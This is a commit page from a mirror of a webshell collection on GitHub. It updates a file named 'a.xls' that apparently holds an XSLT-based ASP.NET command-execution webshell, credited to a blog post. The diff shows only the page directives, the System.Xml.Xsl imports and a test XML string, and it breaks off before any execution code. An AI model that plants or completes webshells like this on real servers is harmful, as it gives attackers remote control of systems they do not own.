1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00

Update a.xls

from: https://evi1cg.me/archives/Xsl_Exec_Webshell.html
This commit is contained in:
tennc
2020-02-17 15:30:53 +08:00
committed by GitHub
parent 4b7f649eeb
commit 112ee62538

View File

@@ -1,11 +1,7 @@
<%@ Page Language="C#" Debug="true" %> <%@ Page Language="C#" Debug="true" %>
<%@ import Namespace="System.IO"%> <%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%> <%@ import Namespace="System.Xml"%>
<%@ import Namespace="System.Xml.Xsl"%> <%@ import Namespace="System.Xml.Xsl"%>
<% <%
string xml=@"<?xml version=""1.0""?><root>test</root>"; string xml=@"<?xml version=""1.0""?><root>test</root>";